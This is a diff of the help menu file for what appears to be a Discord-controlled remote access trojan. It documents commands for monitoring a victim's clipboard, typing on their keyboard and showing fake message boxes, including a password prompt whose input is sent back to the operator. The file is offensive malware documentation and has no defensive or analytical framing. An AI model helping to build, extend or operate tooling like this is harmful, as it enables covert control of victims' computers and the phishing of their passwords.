simen64/Discord-RAT-v2/help_menu.md

 !clipboard monior url stop = Stops the Clipboard Monitor URL mode !clipboard monitor url status = See the status of the Clipboard Monitor URL mode

+### Message commands
+Different ways to deliver a messag box to the user

+!message title message = Shows a generic message box on the targets computer !message prompt title message = Shows a message box with a text input for the target to enter text which will be sent to you !message password title message = Same as message prompt but with a password input field

 ### Keyboard commands:

 !keyboard write = Use the keyboard to write